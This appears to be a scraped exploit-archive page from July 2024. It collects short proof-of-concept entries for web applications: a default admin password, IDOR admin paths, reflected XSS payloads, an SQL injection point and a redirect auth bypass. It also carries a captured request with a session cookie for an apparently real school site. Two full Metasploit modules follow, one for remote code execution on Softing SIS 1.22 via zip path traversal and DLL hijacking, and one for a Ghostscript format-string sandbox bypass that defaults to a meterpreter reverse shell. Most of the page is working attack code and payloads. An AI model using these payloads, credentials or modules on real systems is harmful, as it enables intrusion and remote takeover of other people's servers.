LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

PPDB ONLINE version 1.3 appears to suffer from an administrative page disclosure issue.

====================================================================================================================================  
| # Title     : PPDB ONLINE V.1.3  HTML Form in redirect page Vulnerability                                                        |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   |  
| # Vendor    : https://berkas.siap-ppdb.com/                                                                                      |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/pass  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/elearning7.smpn49-jkt.sch.id/login.php  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

PPDB ONLINE 1.3 Administrative Page Disclosure

PHP MaXiMuS version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP MaXiMuS v2.5.2 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://php-maximus.fr/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

PHP MaXiMuS 2.5.2 Cross Site Scripting

NUKE SENTINEL version 2.5.2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : NUKE SENTINEL v2.5.2 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.ravenphpscripts.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>[+] https://www/127.0.0.1/zmasterfr/modules.php?file=topics&name=News&topic=7'"()%26%25<acx><ScRiPt >prompt(935655)</ScRiPt>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

NUKE SENTINEL 2.5.2 Cross Site Scripting

Minfotech CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Minfotech CMS v2.0 Sql injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://minfotech.in/AboutUs                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /project_list?name=stretch_films <===== inject here[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films[+] Login : /admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Minfotech CMS 2.0 SQL Injection

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

This Metasploit module chains two vulnerabilities to achieve authenticated remote code execution against Softing Secure Integration Server version 1.22. In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerability when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk. In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system. The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication. A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'zip'require 'metasploit/framework/login_scanner/softing_sis'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Softing Secure Integration Server v1.22 Remote Code Execution',        'Description' => %q{          This module chains two vulnerabilities (CVE-2022-1373 and CVE-2022-2334) to achieve authenticated remote code execution against Softing Secure Integration Server v1.22.          In CVE-2022-1373, the restore configuration feature is vulnerable to a directory traversal vulnerablity when processing zip files. When using the "restore configuration" feature to upload a zip file containing a path traversal file which is a dll called ..\..\..\..\..\..\..\..\..\..\..\Windows\System32\wbem\wbemcomn.dll. This causes the file C:\Windows\System32\wbem\wbemcomn.dll to be created and executed upon touching the disk.          In CVE-2022-2334, the planted wbemcomn.dll is used in a DLL hijacking attack when Softing Secure Integration Server restarts upon restoring configuration, which allows us to execute arbitrary code on the target system.          The chain demonstrated in Pwn2Own used a signature instead of a password. The signature was acquired by running an ARP spoofing attack against the local network where the Softing SIS server was located. A username is also required for signature authentication.          A custom DLL can be provided to use in the exploit instead of using the default MSF-generated one. Refer to the module documentation for more details.        },        'License' => MSF_LICENSE,        'Author' => [          'Chris Anastasio (muffin) of Incite Team', # discovery          'Steven Seeley (mr_me) of Incite Team', # discovery          'Imran E. Dawoodjee <imrandawoodjee.infosec[at]gmail.com>', # msf module        ],        'References' => [          ['CVE', '2022-1373'],          ['CVE', '2022-2334'],          ['ZDI', '22-1154'],          ['ZDI', '22-1156'],          ['URL', 'https://industrial.softing.com/fileadmin/psirt/downloads/syt-2022-5.html'],          ['URL', 'https://ide0x90.github.io/softing-sis-122-rce/']        ],        'DefaultOptions' => {          'RPORT' => 8099,          'SSL' => false,          'EXITFUNC' => 'thread',          'WfsDelay' => 300        },        'Platform' => 'win',        # the software itself only supports x64, see        # https://industrial.softing.com/products/opc-opc-ua-software-platform/integration-platform/secure-integration-server.html        'Arch' => [ARCH_X64],        'Targets' => [          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-07-27',        'Privileged' => true,        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_fs_delete_file            ]          }        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('SIGNATURE', [false, 'Use a username/signature pair instead of username/password pair to authenticate']),        OptString.new('USERNAME', [false, 'The username to specify for authentication.', 'admin']),        OptString.new('PASSWORD', [false, 'The password to specify for authentication', 'admin']),        OptString.new('DLLPATH', [false, 'Custom compiled DLL to use'])      ]    )    self.needs_cleanup = true  end  # this will be updated with the signature from "check"  @signature = nil  # create a checker instance to reuse code from the Softing SIS login bruteforce module  def checker_instance    Metasploit::Framework::LoginScanner::SoftingSIS.new(      configure_http_login_scanner(        host: datastore['RHOSTS'],        port: datastore['RPORT'],        connection_timeout: 5      )    ).dup  end  # check if the generated/provided signature is valid for the specified user  def signature_check(user, signature)    send_request_cgi({      'method' => 'GET',      'uri' => "/runtime/core/user/#{user}/authentication",      'vars_get' => {        'User' => user,        'Signature' => signature      }    })  end  def check    # check the Softing SIS version    softing_version_res = checker_instance.check_setup    unless softing_version_res      return CheckCode::Unknown    end    softing_version = Rex::Version.new(softing_version_res)    print_status("#{peer} - Found Softing Secure Integration Server #{softing_version}")    # the vulnerabilities are to be fixed in version 1.30 according to the Softing advisory    # so we will not continue if the version is not vulnerable    unless softing_version < Rex::Version.new('1.30')      return CheckCode::Safe    end    # if the operator provides a signature, then use that instead of the username and password    if datastore['SIGNATURE']      print_status("#{peer} - Authenticating as user #{datastore['USERNAME']} with signature #{datastore['SIGNATURE']}...")      # send a GET request to /runtime/core/user/<username>/authentication      signature_check_res = signature_check(datastore['USERNAME'], datastore['SIGNATURE'])      # if we cannot connect at this point, we only know that the version is < 1.30      # the system "appears" to be vulnerable      unless signature_check_res        print_error("#{peer} - Connection failed!")      end      # if the signature is correct, 200 OK is returned      if signature_check_res.code == 200        print_good("#{peer} - Signature #{datastore['SIGNATURE']} is valid for user #{datastore['USERNAME']}")        @signature = datastore['SIGNATURE']      else        print_error("#{peer} - Signature #{datastore['SIGNATURE']} is invalid for user #{datastore['USERNAME']}!")      end    # login with username and password    else      # get the authentication token      auth_token = checker_instance.get_auth_token(datastore['USERNAME'])      # generate the signature      @signature = checker_instance.generate_signature(auth_token[:proof], datastore['USERNAME'], datastore['PASSWORD'])      # check the generated signatures' validity      signature_check_res = signature_check(datastore['USERNAME'], @signature)      # if we cannot connect, then the system "appears" to be vulnerable      unless signature_check_res        print_error("#{peer} - Connection failed!")      end      # if the signature is correct, 200 OK is returned      if signature_check_res.code == 200        print_good("#{peer} - Valid credentials provided")      else        print_error("#{peer} - Invalid credentials!")      end    end    # if the version is less than 1.30 it's supposedly vulnerable    # but there is no way to confirm vulnerability existence without actually exploiting    # so instead of "Vulnerable", return "Appears"    CheckCode::Appears  end  def exploit    # did the operator specify a custom DLL? If not...    if datastore['DLLPATH']      # otherwise, just use their provided DLL and assume they compiled everything correctly      # there is no way to check if it's compiled correctly anyway      dll_path = datastore['DLLPATH']    else      # have MSF create the malicious DLL      path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-2334')      datastore['EXE::Path'] = path      datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')      print_status('Generating payload DLL...')      dll = generate_payload_dll      dll_name = 'wbemcomn.dll'      dll_path = store_file(dll, dll_name)      print_status("Created #{dll_path}")    end    # backup the Softing SIS configuration    print_status("#{peer} - Saving configuration...")    get_config_zip_res = send_request_cgi({      'method' => 'GET',      'uri' => '/runtime/core/config-download',      'vars_get' => {        'User' => datastore['USERNAME'],        'Signature' => @signature      }    })    # end if we cannot get the configuration for some reason    unless get_config_zip_res      fail_with Failure::Unreachable, "#{peer} - Could not obtain configuration"    end    # status code 200 is the expected response to getting the configuration ZIP    unless get_config_zip_res.code == 200      # for verbosity, save the JSON response      get_config_zip_res_json = get_config_zip_res.get_json_document      vprint_error("#{peer} - #{get_config_zip_res_json}")      fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{get_config_zip_res.code}, could not obtain configuration"    end    # if successful, the body cnotains the configuration ZIP    config_zip = get_config_zip_res.body    # config_download.zip is the name of the configuration ZIP when downloading from the browser    # append a hash based on the peer address to prevent overwriting the config file if there are multiple targets    config_zip_name = "config_download_#{Digest::MD5.hexdigest(peer)}.zip"    # store the config zip file    config_zip_path = store_file(config_zip, config_zip_name)    print_status("Saved configuration to #{config_zip_path}")    # insert the malicious DLL    Zip::File.open(config_zip_path, Zip::File::CREATE) do |zipfile|      zipfile.add('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\wbem\\wbemcomn.dll', dll_path)    end    # restore the configuration    restore_config_res = send_request_cgi({      'method' => 'PUT',      'uri' => '/runtime/core/config-restore',      'cookie' => "systemLang=en-US; lang=en; User=#{datastore['USERNAME']}; Signature=#{@signature}",      'vars_get' => {        'User' => datastore['USERNAME'],        'Signature' => @signature      },      'data' => File.read(config_zip_path)    })    # no response    unless restore_config_res      fail_with Failure::Unreachable, "#{peer} - Could not restore configuration!"    end    # bad response    unless restore_config_res.code == 200      # for verbosity, show the JSON response      restore_config_res_json = restore_config_res.get_json_document      vprint_error("#{peer} - #{restore_config_res_json}")      fail_with Failure::UnexpectedReply, "#{peer} - Returned code #{restore_config_res.code}, could not restore configuration!"    end  end  # clean up the planted DLL if the session is meterpreter  def on_new_session(session)    super    unless file_dropper_delete_file(session, 'C:\\Windows\\System32\\wbem\\wbemcomn.dll')      # if the exploit was successful, register the malicious wbemcomn.dll file for cleanup      register_file_for_cleanup('C:\\Windows\\System32\\wbem\\wbemcomn.dll')    end  end  # Store the file in the MSF local directory (/root/.msf4/local/) so it can be used when creating the ZIP file  # literal copypasta from exploits/windows/fileformat/cve_2017_8464_lnk_rce  def store_file(data, filename)    if !::File.directory?(Msf::Config.local_directory)      FileUtils.mkdir_p(Msf::Config.local_directory)    end    if filename && !filename.empty?      fname, ext = filename.split('.')    else      fname = "local_#{Time.now.utc.to_i}"    end    fname = ::File.split(fname).last    fname.gsub!(/[^a-z0-9._-]+/i, '')    fname << ".#{ext}"    path = File.join("#{Msf::Config.local_directory}/", fname)    full_path = ::File.expand_path(path)    File.open(full_path, 'wb') { |fd| fd.write(data) }    full_path.dup  endend

Softing Secure Integration Server 1.22 Remote Code Execution

This Metasploit module exploits a format string vulnerability in Ghostscript versions before 10.03.1 to achieve a SAFER sandbox bypass and execute arbitrary commands. This vulnerability is reachable via libraries such as ImageMagick. This exploit only works against Ghostscript versions 10.03.0 and 10.01.2. Some offsets adjustment will probably be needed to make it work with other versions.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit  Rank = ExcellentRanking  include Msf::Exploit::FILEFORMAT  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ghostscript Command Execution via Format String',        'Description' => %q{          This module exploits a format string vulnerability in Ghostscript          versions before 10.03.1 to achieve a SAFER sandbox bypass and execute          arbitrary commands. This vulnerability is reachable via libraries such as          ImageMagick.          This exploit only works against Ghostscript versions 10.03.0 and          10.01.2. Some offsets adjustement will probably be needed to make it          work with other versions.        },        'Author' => [          'Thomas Rinsma', # Vuln discovery and PoC          'Christophe De La fuente' # Metasploit module        ],        'References' => [          ['CVE', '2024-29510'],          ['URL', 'https://bugs.ghostscript.com/show_bug.cgi?id=707662'],          ['URL', 'https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/']        ],        'DisclosureDate' => '2024-03-14',        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],        'Privileged' => false,        'Targets' => [          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ],              'DefaultOptions' => {                # Payload is not set automatically when selecting this target.                # Select a x64 fetch payload by default.                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('FILENAME', [true, 'Output Encapsulated PostScript (EPS) file', 'msf.eps']),      OptInt.new('INDEX_OUT_PTR', [true, 'Index of `gp_file *out` on the stack (see the full documentation for details `info -d`)', 5])    ])  end  def exploit    xploit = template.sub('MSF_PAYLOAD', payload.encoded)    xploit = xploit.sub('MSF_IDXOUTPTR', datastore['INDEX_OUT_PTR'].to_s)    file_create(xploit)    print_good('You will need to start a handler for the selected payload first.')    print_good("Example usage with Ghostscript: gs -q -dSAFER -dBATCH -dNODISPLAY #{datastore['FILENAME']}")    print_good("Example usage with ImageMagick: identify #{datastore['FILENAME']}")  end  def template    xploit = File.read(File.join(      Msf::Config.data_directory, 'exploits', 'CVE-2024-29510', 'ghostscript_format_string.eps'    ))    # Remove comments    xploit.gsub!(/\s*% .+$/, '')    # Remove empty lines and lines with a single %    xploit.gsub(/^%?$\n/, '')  endend

Ghostscript Command Execution / Format String

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

Source

Packet Storm